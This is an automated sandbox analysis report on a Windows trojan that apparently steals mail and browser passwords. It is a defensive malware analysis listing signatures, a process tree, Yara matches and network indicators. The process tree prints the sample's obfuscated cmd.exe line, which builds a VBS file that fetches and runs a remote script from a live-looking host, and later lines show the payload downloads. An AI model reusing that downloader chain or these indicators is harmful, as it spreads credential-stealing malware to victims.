Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dGuYmJNS1K.exe

Overview

General Information

Sample Name:dGuYmJNS1K.exe
Original Sample Name:897af5616bfd6af5b687876924f39ee3.exe
Analysis ID:1330994
MD5:897af5616bfd6af5b687876924f39ee3
SHA1:d560fdaed07146a1b4fa519ae023bfa61c1594a6
SHA256:8a013b99a9b82e0f67b3e472f7627052915507916311f10cac5b69e87f3d19d4
Tags:32exetrojan
Infos:

Detection

MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected MailPassView
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Writes to foreign memory regions
Command shell drops VBS files
Contains functionality to modify clipboard data
Yara detected WebBrowserPassView password recovery tool
Obfuscated command line found
Found API chain indicative of sandbox detection
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Drops files with a non-matching file extension (content does not match file extension)
OS version to string mapping found (often used in BOTs)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to retrieve information about pressed keystrokes
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to execute programs as a different user
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to launch a program with higher privileges
Potential key logger detected (key state polling based)
Contains functionality to simulate mouse events
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Classification

  • System is w10x64
  • dGuYmJNS1K.exe (PID: 6972 cmdline: C:\Users\user\Desktop\dGuYmJNS1K.exe MD5: 897AF5616BFD6AF5B687876924F39EE3)
    • cmd.exe (PID: 6008 cmdline: C:\Windows\system32\cmd.exe /c echo|set /p=^"sq048=".":r54="i":y8628="g":k4js7=":":GetO^">%Public%\bjk6l9.vbs&echo|set /p=^"bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")^">>%Public%\bjk6l9.vbs&cd c:\windows\system32\&cmd /c start %Public%\bjk6l9.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2536 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 3084 cmdline: C:\Windows\system32\cmd.exe /S /D /c" set /p="sq048=".":r54="i":y8628="g":k4js7=":":GetO" 1>C:\Users\Public\bjk6l9.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 2852 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 2800 cmdline: C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")" 1>>C:\Users\Public\bjk6l9.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 6668 cmdline: cmd /c start C:\Users\Public\bjk6l9.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wscript.exe (PID: 6336 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\bjk6l9.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
          • ef2dsio342ai.exe (PID: 7236 cmdline: "C:\wql455oi0\ef2dsio342ai.exe" ef2dsio342 MD5: 0ADB9B817F1DF7807576C2D7068DD931)
            • attrib.exe (PID: 7256 cmdline: c:/windows/SysWOW64/attrib.exe MD5: 0E938DD280E83B1596EC6AA48729C2B0)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000D.00000002.2910031711.0000000000773000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
    0000000D.00000002.2910031711.0000000000773000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
      0000000C.00000002.1930692252.0000000004013000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
        0000000C.00000002.1930692252.0000000004013000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
          Process Memory Space: ef2dsio342ai.exe PID: 7236JoeSecurity_MailPassViewYara detected MailPassViewJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            13.2.attrib.exe.81bcfc.1.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
              13.2.attrib.exe.81bcfc.1.unpackAPT_NK_BabyShark_KimJoingRAT_Apr19_1Detects BabyShark KimJongRATFlorian Roth
              • 0x11bb0:$a1: logins.json
              • 0x11b10:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
              • 0x12334:$s4: \mozsqlite3.dll
              • 0x115a4:$s5: SMTP Password
              12.2.ef2dsio342ai.exe.40c211c.2.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
                12.2.ef2dsio342ai.exe.40c211c.2.unpackAPT_NK_BabyShark_KimJoingRAT_Apr19_1Detects BabyShark KimJongRATFlorian Roth
                • 0x11bb0:$a1: logins.json
                • 0x11b10:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
                • 0x12334:$s4: \mozsqlite3.dll
                • 0x115a4:$s5: SMTP Password
                13.2.attrib.exe.7b9efc.0.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
                  Click to see the 17 entries
                  No Sigma rule has matched
                  No Snort rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: dGuYmJNS1K.exeReversingLabs: Detection: 21%
                  Source: dGuYmJNS1K.exeVirustotal: Detection: 30%Perma Link
                  Source: C:\wql455oi0\lp1a3Virustotal: Detection: 10%Perma Link
                  Source: dGuYmJNS1K.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 206.71.149.162:443 -> 192.168.2.4:49737 version: TLS 1.2
                  Source: dGuYmJNS1K.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: c:\U\Release\s6i226.pdb source: ef2dsio342ai.exe, 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmp, ef2dsio342ai.exe, 0000000C.00000003.1877832158.0000000001F51000.00000004.00000020.00020000.00000000.sdmp, ef2dsio342ai.exe, 0000000C.00000003.1877743856.0000000001F84000.00000004.00000020.00020000.00000000.sdmp, ef2dsio342ai.exe, 0000000C.00000003.1877743856.0000000001FB5000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: c:\U\Release\s6i226.pdb source: ef2dsio342ai.exe, 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmp, ef2dsio342ai.exe, 0000000C.00000003.1877832158.0000000001F51000.00000004.00000020.00020000.00000000.sdmp, ef2dsio342ai.exe, 0000000C.00000003.1877743856.0000000001F84000.00000004.00000020.00020000.00000000.sdmp, ef2dsio342ai.exe, 0000000C.00000003.1877743856.0000000001FB5000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: ef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000004013000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2910031711.0000000000773000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: ef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000004013000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2910031711.0000000000773000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: C:\U3\GtYD2\Release\GtYD2.pdb source: dGuYmJNS1K.exe
                  Source: C:\Users\user\Desktop\dGuYmJNS1K.exeCode function: 0_2_00FE756C FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00FE756C
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D7E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,12_2_00D7E387
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D8A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00D8A0FA
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D8A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,12_2_00D8A488
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D865F1 FindFirstFileW,FindNextFileW,FindClose,12_2_00D865F1
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D872E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,12_2_00D872E9
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D87248 FindFirstFileW,FindClose,12_2_00D87248
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D7D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00D7D836
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D7DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00D7DB69
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D89F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00D89F9F
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10001B50 FindFirstFileW,_fseek,_malloc,_fseek,__fread_nolock,12_2_10001B50
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10001CB0 FindFirstFileW,std::ios_base::_Ios_base_dtor,_rand,Sleep,_rand,Sleep,std::ios_base::_Ios_base_dtor,_rand,Sleep,std::ios_base::_Ios_base_dtor,_rand,Sleep,12_2_10001CB0
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000DD08 __ioinit,FindFirstFileW,___lock_fhandle,FindFirstFileW,__lseek_nolock,12_2_1000DD08
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000DDF7 FindFirstFileW,FindFirstFileW,__get_osfhandle,FindFirstFileW,FindFirstFileW,SetFilePointer,GetLastError,__dosmaperr,12_2_1000DDF7
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10005E22 __getstream,@_EH4_CallFilterFunc@8,FindFirstFileW,__openfile,12_2_10005E22
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10015FFE __ioinit,GetLastError,__dosmaperr,__alloc_osfhnd,___createFile,FindFirstFileW,___createFile,GetLastError,__dosmaperr,GetFileType,GetLastError,__dosmaperr,CloseHandle,__set_osfhnd,__lseeki64_nolock,__read_nolock,__chsize_nolock,__lseeki64_nolock,__lseeki64_nolock,__lseeki64_nolock,__read_nolock,__lseeki64_nolock,__lseeki64_nolock,__lseeki64_nolock,CloseHandle,FindFirstFileW,___createFile,GetLastError,__dosmaperr,__free_osfhnd,__invoke_watson,12_2_10015FFE
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10006006 FindFirstFileW,FindFirstFileW,_memcpy_s,FindFirstFileW,__read_nolock,__filbuf,12_2_10006006
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_100022B0 ef2dsio342,FindFirstFileW,FindFirstFileW,FindFirstFileW,FindFirstFileW,12_2_100022B0
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000651B FindFirstFileW,FindFirstFileW,__write,__lseeki64,ReadFile,__write,__write,__write,12_2_1000651B
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10006874 FindFirstFileW,__lock_file,FindFirstFileW,__ftell_nolock,12_2_10006874
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_100068DC FindFirstFileW,FindFirstFileW,__ftell_nolock,FindFirstFileW,__flush,FindFirstFileW,__write,12_2_100068DC
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000696B FindFirstFileW,__lock_file,FindFirstFileW,__fseek_nolock,12_2_1000696B
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10006A35 FindFirstFileW,__flush,__freebuf,__close,_free,12_2_10006A35
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10006AA1 FindFirstFileW,__lock_file,FindFirstFileW,__fclose_nolock,12_2_10006AA1
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000CB3C FindFirstFileW,__sopen_s,12_2_1000CB3C
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000557C FindFirstFileW,FindFirstFileNameW,__lock,FindNextChangeNotification,FindNextChangeNotification,EnterCriticalSection,12_2_1000557C
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_100055BB FindFirstFileNameW,__lock,EnterCriticalSection,12_2_100055BB
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10013A05 FindFirstFileW,SetStdHandle,12_2_10013A05
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10005A07 FindFirstFileW,FindFirstFileW,12_2_10005A07
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10003A90 FindFirstFileW,_memmove,12_2_10003A90
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000BD1B __ioinit,FindFirstFileW,___lock_fhandle,FindFirstFileW,__lseeki64_nolock,12_2_1000BD1B
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000DDCE FindFirstFileW,__unlock_fhandle,12_2_1000DDCE
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000BDFA FindFirstFileW,__unlock_fhandle,12_2_1000BDFA
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000DE70 FindFirstFileW,12_2_1000DE70
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000BF8C __ioinit,FindFirstFileW,___lock_fhandle,FindFirstFileW,__write_nolock,12_2_1000BF8C
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000C052 FindFirstFileW,__unlock_fhandle,12_2_1000C052
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000C07B FindFirstFileW,FindFirstFileW,__ioinit,FindFirstFileW,GetStdHandle,__lseeki64_nolock,__isatty,GetConsoleMode,GetConsoleCP,WideCharToMultiByte,WriteFile,WriteFile,WriteFile,WriteFile,WideCharToMultiByte,WriteFile,GetLastError,WriteFile,GetLastError,__dosmaperr,12_2_1000C07B
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_100068D4 FindFirstFileW,12_2_100068D4
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_100088F0 FindFirstFileW,12_2_100088F0
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_100069E2 FindFirstFileW,12_2_100069E2
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_10006B10 FindFirstFileW,12_2_10006B10
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_1000CDC0 FindFirstFileW,12_2_1000CDC0
                  Source: C:\Windows\SysWOW64\attrib.exeCode function: 13_2_0040C5B8 FindFirstFileW,13_2_0040C5B8
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: global trafficHTTP traffic detected: GET //g1 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: m4gx.dns04.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /g1/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: m4gx.dns04.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /lp1a.php HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: m4gx.dns04.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /lp1am1.dfhyhgf HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: m4gx.dns04.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /v/lp1382.dfhyhgf HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: m4gx.dns04.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /lp1aa3.dfhyhgf HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: m4gx.dns04.comConnection: Keep-Alive
                  Source: ef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000003CCA000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, attrib.exe, 0000000D.00000002.2910031711.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://193.149.176.210/filept/
                  Source: ef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000003CCA000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2910031711.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://193.149.176.210/filept/S
                  Source: attrib.exe, 0000000D.00000002.2910031711.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://206.71.149.162/
                  Source: ef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000003CCA000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2910031711.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://206.71.149.162/U
                  Source: ef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000003CCA000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, attrib.exe, 0000000D.00000002.2910031711.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://206.71.149.162/d1.x
                  Source: ef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000003CCA000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, attrib.exe, 0000000D.00000002.2910031711.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://206.71.149.162/d2.x
                  Source: lp1a3.8.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                  Source: lp1a3.8.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                  Source: lp1a3.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                  Source: lp1a3.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                  Source: lp1a3.8.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                  Source: attrib.exe, 0000000D.00000002.2913462896.0000000006DE7000.00000004.00001000.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2913462896.0000000006E69000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://iptc.org/std/Iptc4xmpExt/2008-02-29/
                  Source: attrib.exe, 0000000D.00000002.2913462896.0000000006DE7000.00000004.00001000.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2913462896.0000000006E69000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ns.useplus.org/ldf/xmp/1.0/
                  Source: lp1a3.8.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                  Source: lp1a3.8.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                  Source: lp1a3.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                  Source: lp1a3.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                  Source: lp1a3.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                  Source: lp1a3.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                  Source: ef2dsio342ai.exe, 0000000C.00000000.1875829113.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmp, lp1a3.8.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
                  Source: ef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000003CCA000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, attrib.exe, 0000000D.00000002.2910031711.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.geoplugin.net/php.gp
                  Source: attrib.exe, 0000000D.00000002.2913462896.0000000006E65000.00000004.00001000.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2913462896.0000000006DE7000.00000004.00001000.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2913462896.0000000006E69000.00000004.00001000.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2913462896.0000000006E80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gimp.org/xmp/
                  Source: ef2dsio342ai.exe, 0000000C.00000002.1930692252.0000000003CCA000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, attrib.exe, 0000000D.00000002.2911814872.0000000005002000.00000004.00001000.00020000.00000000.sdmp, attrib.exe, 0000000D.00000002.2910031711.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.indyproject.org/
                  Source: attrib.exe, 0000000D.00000002.2910031711.0000000000773000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                  Source: wscript.exe, 00000008.00000003.1674016827.0000000003491000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1673911576.0000000003491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://m4gx.dns04.com//g1K
                  Source: wscript.exe, 00000008.00000003.1674016827.0000000003491000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1673911576.0000000003491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://m4gx.dns04.com//g1L
                  Source: wscript.exe, 00000008.00000003.1674016827.0000000003491000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1673911576.0000000003491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://m4gx.dns04.com//g1c
                  Source: wscript.exe, 00000008.00000003.1673911576.0000000003491000.00000004.00000020.00020000.00000000.sdmp, g1[1].htm.8.drString found in binary or memory: https://m4gx.dns04.com/g1/
                  Source: wscript.exe, 00000008.00000003.1674016827.0000000003491000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1673911576.0000000003491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://m4gx.dns04.com/g1/3
                  Source: wscript.exe, 00000008.00000003.1674016827.0000000003491000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1673911576.0000000003491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://m4gx.dns04.com/g1/S
                  Source: wscript.exe, 00000008.00000003.1674016827.0000000003491000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1673911576.0000000003491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://m4gx.dns04.com/g1/k
                  Source: wscript.exe, 00000008.00000003.1738354717.0000000005E0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1717350782.0000000005E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://m4gx.dns04.com/lp1a.php
                  Source: wscript.exe, 00000008.00000003.1738354717.0000000005E0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1717350782.0000000005E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://m4gx.dns04.com/lp1am1.dfhyhgf
                  Source: wscript.exe, 00000008.00000003.1738235445.00000000074BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1738155988.0000000005FF1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1738742128.00000000074BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1738724139.0000000005FF1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1738235445.00000000074AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1738354717.0000000005E0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1738217818.0000000005FF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://m4gx.dns04.com/v/lp1382.dfhyhgf
                  Source: wscript.exe, 00000008.00000003.1738235445.00000000074BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1738742128.00000000074BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://m4gx.dns04.com/v/lp1382.dfhyhgf-
                  Source: wscript.exe, 00000008.00000003.1738235445.00000000074AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://m4gx.dns04.com/v/lp1382.dfhyhgf9-A2D8-08002B30309D
                  Source: wscript.exe, 00000008.00000003.1738155988.0000000005FF1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1738724139.0000000005FF1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1738217818.0000000005FF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://m4gx.dns04.com/v/lp1382.dfhyhgfE
                  Source: wscript.exe, 00000008.00000003.1738155988.0000000005FF1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1738724139.0000000005FF1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1738217818.0000000005FF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://m4gx.dns04.com/v/lp1382.dfhyhgfS
                  Source: lp1a3.8.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                  Source: lp1a3.8.drString found in binary or memory: https://www.globalsign.com/repository/0
                  Source: unknownDNS traffic detected: queries for: m4gx.dns04.com
                  Source: C:\wql455oi0\ef2dsio342ai.exeCode function: 12_2_00D8D7A1 InternetReadFile,SetEvent,GetLastError,SetEvent,12_2_00D8D7A1
